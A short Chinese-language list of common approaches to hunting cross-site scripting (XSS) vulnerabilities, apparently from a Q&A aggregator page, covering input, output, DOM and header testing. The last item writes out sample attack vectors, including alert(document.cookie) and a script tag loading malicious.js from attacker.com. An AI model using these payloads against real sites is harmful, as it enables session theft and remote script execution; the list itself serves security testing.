xss漏洞挖掘思路包括
时间: 2023-11-19 20:33:49 浏览: 118
以下是一些常见的 XSS 漏洞挖掘思路:
1. 输入点测试:检查应用程序中任何通过用户输入向服务器发送数据的位置,例如表单、搜索框、评论框等。
2. 输出点测试:检查应用程序中任何将数据呈现给用户的位置,例如页面标题、错误消息、搜索结果等。
3. 触发点测试:检查应用程序中任何会触发 JavaScript 代码执行的位置,例如 onclick、onload、onsubmit 等事件处理程序。
4. 绕过过滤器测试:检查应用程序中任何对用户输入进行过滤或转义的地方,例如 HTML、JavaScript 等。
5. Cookie 测试:检查应用程序中任何使用 cookie 的地方,例如登录、会话管理等。
6. HTTP 头测试:检查应用程序中任何使用 HTTP 头的地方,例如 User-Agent、Referer、Host 等。
7. DOM 测试:检查应用程序中任何使用动态创建 DOM 元素的地方,例如 document.createElement()、innerHTML 等。
8. 嵌入式对象测试:检查应用程序中任何使用嵌入式对象的地方,例如 Flash、Java applet、PDF 等。
9. 漏洞利用测试:尝试利用已知的 XSS 漏洞,以及常见的 XSS 攻击向量,例如 alert(document.cookie)、<script src="http://attacker.com/malicious.js"></script> 等。
阅读全文